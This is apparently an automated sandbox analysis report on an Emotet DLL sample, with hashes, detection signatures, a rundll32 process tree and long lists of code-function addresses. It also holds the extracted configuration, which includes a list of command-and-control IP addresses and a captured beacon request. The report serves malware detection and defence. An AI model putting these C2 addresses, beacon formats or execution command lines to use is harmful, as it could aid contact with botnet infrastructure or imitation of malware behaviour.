
Windows Analysis Report FIyE6huzxV

Overview

General Information

Sample Name: FIyE6huzxV (renamed file extension from none to dll)
Analysis ID: 524856
MD5: ae5017480fc46fea5f5b35e684be8639
SHA1: b5f7941d2b2be6fc1ee9a95a214a39404661b2bc
SHA256: 610f8e0834645e2bf2a47c9d7f8cff5e902bef45750f3c2d1ad84bea66b681ca
Tags: 32, dll, exe

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6404 cmdline: loaddll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6416 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6436 cmdline: rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • BackgroundTransferHost.exe (PID: 6816 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm",sRLFwndulUmgRNP MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Esbkudiqskvxrfyc\iscoyl.gsm",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6472 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6604 cmdline: rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7044 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7060 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6672 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6852 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1720 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5424 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4792 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5452 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1348 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6464 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.350213708.0000000002E7A000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000001.00000002.352423510.00000000008EB000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
0000000A.00000002.377422235.00000000030DA000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000013.00000002.773455424.0000000003285000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.352676760.00000000034EA000.00000004.00000020.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(2 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.loaddll32.exe.90bee8.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.3505238.1.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.2e943e0.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.2e943e0.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.2a55338.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(5 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started | Author: FPT.EagleEye | Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6436, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL, ProcessId: 6816

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 5.2.rundll32.exe.2e943e0.0.raw.unpack | Malware Configuration Extractor: Emotet (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: FIyE6huzxV.dll | Virustotal: Detection: 19%
Source: FIyE6huzxV.dll | ReversingLabs: Detection: 22%
Source: FIyE6huzxV.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: FIyE6huzxV.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E6CD1EE FindFirstFileExA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6CD1EE FindFirstFileExA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E1A80 FindFirstFileW

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.7:49764 -> 51.178.61.60:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 51.178.61.60 187
C2 URLs / IPs found in malware configuration (see the C2 list in the Malware Configuration section above)
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: EcobandGH
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic | HTTP traffic detected: GET /ixufuEvpOVRaGsMcwVdxxNdVEbwDu HTTP/1.1 | Cookie: aCktUHAkMKD=TfyHqYLXTgYzdruEwNizDAfbCqZTgvqsH66CTQb1ytbBq80BnlqrtzN99nJXwaPo9lxyz/uAmFRullUIX0ZowWZs9CNvL/wvwz9s0Lyk9stGcsTkt35/6+ScCB6oHb65u6YN4GepkyMPsVCOcYLehsOLK7Ic3r5z0nvRBBYP/pa0Ftru5H1By1CJJuTLx5srUGF+6FxghaKUJmk9h02X8MAniWAG0gALx5fIxZLs/7s3UdtcvXiWG9uyM0dj8j6ddiLVwX64otV1KIALayfbuVeEUs4Up9/eppFXVuKG+YmasQ== | Host: 51.178.61.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 207.148.81.119
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: rundll32.exe, 00000013.00000003.440932609.00000000032E2000.00000004.00000001.sdmp | String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000013.00000002.773553604.00000000032BA000.00000004.00000020.sdmp | String found in binary or memory: https://51.178.61.60/Y
Source: rundll32.exe, 00000013.00000003.440932609.00000000032E2000.00000004.00000001.sdmp | String found in binary or memory: https://51.178.61.60/ixufuEvpOVRaGsMcwVdxxNdVEbwDu
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F1027 InternetReadFile
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E6A5EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 1.2.loaddll32.exe.90bee8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.3505238.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.2e943e0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.2e943e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2a55338.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.2a55338.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.30f4200.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.loaddll32.exe.90bee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.3505238.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.30f4200.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.350213708.0000000002E7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.352423510.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.377422235.00000000030DA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.773455424.0000000003285000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.352676760.00000000034EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.351034288.0000000003565000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.351194213.0000000002A3A000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: FIyE6huzxV.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | File deleted: C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm:Zone.Identifier
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Esbkudiqskvxrfyc\
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00831A3C1_2_00831A3C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008120431_2_00812043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082E4411_2_0082E441
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008138451_2_00813845
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00812A461_2_00812A46
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081A0481_2_0081A048
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008126541_2_00812654
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00819A571_2_00819A57
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082406E1_2_0082406E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00811C761_2_00811C76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008193841_2_00819384
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081758F1_2_0081758F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00824D8D1_2_00824D8D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00814F8E1_2_00814F8E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081FD911_2_0081FD91
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008311931_2_00831193
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082B3971_2_0082B397
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082D99A1_2_0082D99A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00822FA21_2_00822FA2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00829DA11_2_00829DA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00824BAA1_2_00824BAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00827BB21_2_00827BB2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082B1B51_2_0082B1B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081BFB61_2_0081BFB6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008325C31_2_008325C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00816FC41_2_00816FC4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081A3DF1_2_0081A3DF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008155E81_2_008155E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082BFE81_2_0082BFE8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008303F11_2_008303F1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081C5FE1_2_0081C5FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008135021_2_00813502
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008123091_2_00812309
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082FD101_2_0082FD10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081251C1_2_0081251C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008159231_2_00815923
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00816B251_2_00816B25
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0083292B1_2_0083292B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00830B341_2_00830B34
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008313431_2_00831343
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008133451_2_00813345
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082F14D1_2_0082F14D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081C1581_2_0081C158
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00813F5C1_2_00813F5C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082056A1_2_0082056A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00821F6B1_2_00821F6B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082577E1_2_0082577E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A66201_2_6E6A6620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A57301_2_6E6A5730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A5EE01_2_6E6A5EE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6CC6FE1_2_6E6CC6FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6AF7001_2_6E6AF700
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6C37801_2_6E6C3780
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BDC5D1_2_6E6BDC5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6B1CD01_2_6E6B1CD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BDA2D1_2_6E6BDA2D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A2A801_2_6E6A2A80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BA29D1_2_6E6BA29D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6D30741_2_6E6D3074
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6A6620
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6A5730
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6A5EE0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6CC6FE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6AF700
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6C3780
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6BDC5D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6B1CD0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6BDA2D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6A2A80
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6BA29D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6D3074
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E6D1929
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E31A6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E47BC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D220A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D441E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E5220
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D943C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D3845
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D2043
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E748A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D2309
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D3502
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D251C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F292B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E6726
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D5923
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D3345
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F1343
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DC158
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E056A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D9384
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EB397
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F1193
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DD223
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DA048
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EE441
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D2654
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E406E
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030F0687
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D7283
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030ED091
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E66BC
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 19_2_030EA8F0
                      Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E6B5BE0 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E6B5BE0 appears 46 times
